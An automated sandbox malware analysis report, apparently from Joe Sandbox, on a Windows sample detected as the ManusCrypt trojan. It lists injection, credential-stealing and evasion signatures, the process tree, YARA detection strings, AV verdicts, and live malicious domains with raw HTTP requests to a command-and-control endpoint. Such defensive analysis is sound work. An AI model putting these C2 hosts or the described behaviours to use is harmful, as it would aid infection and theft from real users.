Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 700949
MD5: 338057ba65f786f4238be340d64daf08
SHA1: 6571744dbdf2150179e46fbf4de2ce8ba715cbf2
SHA256: bfb5009ee0d70c0e594a9f35fb56d541b91a9e7ab1f396ba01b986f1567e5bac
Tags: exe

Detection

ManusCrypt
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected ManusCrypt
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Creates processes via WMI
Allocates memory in foreign processes
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Contains functionality to compare user and computer (likely to detect sandboxes)
Tries to harvest and steal browser information (history, passwords, etc)
Sets an auto configuration URL for Internet Explorer (IE settings are enforced automatically)
Writes to foreign memory regions
Contains functionality to infect the boot sector
Installs new ROOT certificates
Modifies the context of a thread in another process (thread injection)
Contains functionality to inject threads in other processes
Sets debug register (to hijack the execution of another thread)
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
Contains functionality to clear windows event logs (to hide its activities)
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Queries disk information (often used to detect virtual machines)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64
  • file.exe (PID: 736 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 338057BA65F786F4238BE340D64DAF08)
    • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • file.exe (PID: 6024 cmdline: "C:\Users\user\Desktop\file.exe" -h MD5: 338057BA65F786F4238BE340D64DAF08)
      • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • rundll32.exe (PID: 4636 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4628 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • svchost.exe (PID: 4776 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: 32569E403279B3FD2EDB7EBD036273FA)
        • svchost.exe (PID: 5440 cmdline: C:\Windows\system32\svchost.exe -k WspService MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 368 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2112 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2372 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2340 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1512 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1148 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2564 cmdline: c:\windows\system32\svchost.exe -k netsvcs MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1080 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 3460 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1492 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1924 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1364 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 3584 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1204 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2232 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Winmgmt MD5: 32569E403279B3FD2EDB7EBD036273FA)
        • WMIADAP.exe (PID: 5592 cmdline: wmiadap.exe /F /T /R MD5: 9783D0765F31980950445DFD40DB15DA)
      • svchost.exe (PID: 4488 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2280 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s WpnService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_ManusCrypt | Yara detected ManusCrypt | Joe Security
00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp | Windows_Trojan_Generic_a681f24a | unknown | unknown
  • 0x576f0:$a: _kasssperskdy
  • 0x5861e:$c: {SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_ManusCrypt | Yara detected ManusCrypt | Joe Security
(244 entries in this table; only the first are shown)

Source | Rule | Description | Author | Strings
20.0.svchost.exe.2468b5b0000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
20.0.svchost.exe.2468b5b0000.0.unpack | JoeSecurity_ManusCrypt | Yara detected ManusCrypt | Joe Security
20.0.svchost.exe.2468b5b0000.0.unpack | MALWARE_Win_Chebka | Detects Chebka | ditekSHen
  • 0x58c08:$s1: -k netsvcs
  • 0x583c8:$s3: Mozilla/4.0 (compatible)
  • 0x576f0:$s4: _kasssperskdy
  • 0x56d88:$s5: winssyslog
  • 0x58950:$s6: LoaderDll%d
  • 0x56c60:$s7: cmd.exe /c rundll32.exe shell32.dll,
  • 0x56890:$s8: cmd.exe /c start chrome.exe
  • 0x569f0:$s8: cmd.exe /c start msedge.exe
  • 0x56bd0:$s8: cmd.exe /c start firefox.exe
  • 0x66ef0:$f1: .?AVCHVncManager@@
  • 0x672d8:$f2: .?AVCNetstatManager@@
  • 0x67348:$f3: .?AVCTcpAgentListener@@
  • 0x671c8:$f4: .?AVIUdpClientListener@@
  • 0x67578:$f5: .?AVCShellManager@@
  • 0x67528:$f6: .?AVCScreenSpy@@
20.0.svchost.exe.2468b5b0000.0.unpack | Windows_Trojan_Generic_a681f24a | unknown | unknown
  • 0x576f0:$a: _kasssperskdy
  • 0x5861e:$c: {SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
25.0.svchost.exe.195990b0000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
(312 entries in this table; only the first are shown)

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: https://v.xyzgamev.com/911.html | Avira URL Cloud: Label: malware
Source: https://v.xyzgamev.com/logo.png | Avira URL Cloud: Label: malware
Source: http://35.236.159.79/win.pacAutoConfigURLSOFTWARE | Avira URL Cloud: Label: malware
Source: http://35.236.159.79/win.pac | Avira URL Cloud: Label: malware
Source: v.xyzgamev.com | Virustotal: Detection: 11%
Source: https://v.xyzgamev.com/911.html | Virustotal: Detection: 15%
Source: http://35.236.159.79/win.pacAutoConfigURLSOFTWARE | Virustotal: Detection: 12%
Source: C:\Users\user\AppData\Local\Temp\db.dll | ReversingLabs: Detection: 65%
Source: 19.2.svchost.exe.1b6d6000000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 27.2.svchost.exe.236f3940000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 30.2.svchost.exe.1e554740000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 9.2.svchost.exe.244fc400000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 11.0.svchost.exe.2d6cb270000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 34.0.svchost.exe.1dd8fdb0000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 18.2.svchost.exe.1f97f120000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 22.2.svchost.exe.25139800000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 25.2.svchost.exe.195990b0000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 23.2.svchost.exe.226f8d40000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 20.0.svchost.exe.2468b5b0000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 25.0.svchost.exe.195990b0000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 7.2.svchost.exe.22baf530000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 18.0.svchost.exe.1f97f120000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 11.2.svchost.exe.2d6cb270000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 17.2.svchost.exe.1dbfc920000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 7.0.svchost.exe.22baf530000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 33.2.svchost.exe.23e495b0000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 23.0.svchost.exe.226f8d40000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 37.2.svchost.exe.12dbc510000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 19.0.svchost.exe.1b6d6000000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 29.2.svchost.exe.1f1ed200000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 28.0.svchost.exe.24e72070000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 35.2.svchost.exe.28291080000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 36.2.svchost.exe.151abe70000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 29.0.svchost.exe.1f1ed200000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 37.0.svchost.exe.12dbc510000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 30.0.svchost.exe.1e554740000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 34.2.svchost.exe.1dd8fdb0000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 35.0.svchost.exe.28291080000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 22.0.svchost.exe.25139800000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 33.0.svchost.exe.23e495b0000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 5.2.rundll32.exe.4630000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 17.0.svchost.exe.1dbfc920000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 32.2.svchost.exe.1af63d40000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 28.2.svchost.exe.24e72070000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 27.0.svchost.exe.236f3940000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 36.0.svchost.exe.151abe70000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 20.2.svchost.exe.2468b5b0000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: 32.0.svchost.exe.1af63d40000.0.unpack | Avira: Label: TR/ATRAPS.Gen2
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.188.70:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.3:49725 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046445C0 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,5_2_046445C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04634C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,5_2_04634C20
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04634E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_04634E30
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046356D0 FindFirstFileW,FindClose,5_2_046356D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046357F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,5_2_046357F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04636A40 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,5_2_04636A40
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046342B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,5_2_046342B0
Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF5363F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,7_2_0000022BAF5363F0
Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF534AE3 FindFirstFileW,FindClose,7_2_0000022BAF534AE3
Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF534B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,7_2_0000022BAF534B90
Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF537A30 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,7_2_0000022BAF537A30
Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF5349FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,7_2_0000022BAF5349FF
Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF5706D8 FindFirstFileExA,7_2_0000022BAF5706D8
Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF5357B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_0000022BAF5357B0
Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF54AE20 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,7_2_0000022BAF54AE20
Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF535E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,std::_Xinvalid_argument,std::_Xinvalid_argument,7_2_0000022BAF535E30

Networking

        Source: C:\Windows\System32\svchost.exeDomain query: g.agametog.com
        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
        Source: global trafficHTTP traffic detected: GET /911.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
        Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
        Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 274Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 274Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 1590Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 250Connection: Keep-AliveCache-Control: no-cache
        Source: Joe Sandbox ViewIP Address: 104.21.34.132 104.21.34.132
        Source: svchost.exe, 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.806322399.00000244FDFA0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://35.236.159.79/win.pac
        Source: svchost.exe, 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.806322399.00000244FDFA0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://35.236.159.79/win.pacAutoConfigURLSOFTWARE
        Source: svchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.289708196.000002D6CB064000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.533761701.000002D6CB064000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.303708302.000002D6CB064000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=8198
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid9.9mverp=https://pp.
        Source: svchost.exe, 00000013.00000000.318145699.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.790922595.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.322130353.000001B6D541F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/P
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///WAB-23B4D62B-952A-47E7-969C-B95DBF145D3D.local
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///live.com
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///windows.net
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///xboxlive.com
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: svchost.exe, 00000021.00000002.793587070.0000023E488C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.581835295.0000023E488C2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.585221093.0000023E488C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.comd
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/2DF7
        Source: svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389404564.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net1002
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net12DF7
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.netory
        Source: svchost.exe, 00000009.00000002.795608571.00000244FC25B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p-api.com/json/?fields=8198
        Source: svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.809326059.00000244FE375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.php
        Source: svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpCH
        Source: svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpSTEM
        Source: svchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpy
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/accounts/edit/
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com-969C-B95DBF145D3D.local
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
        Source: svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389404564.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com2
        Source: unknownDNS traffic detected: queries for: v.xyzgamev.com
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0464F540 recv,recv,SetLastError,GetLastError,WSAGetLastError,5_2_0464F540
        Source: global trafficHTTP traffic detected: GET /911.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
        Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
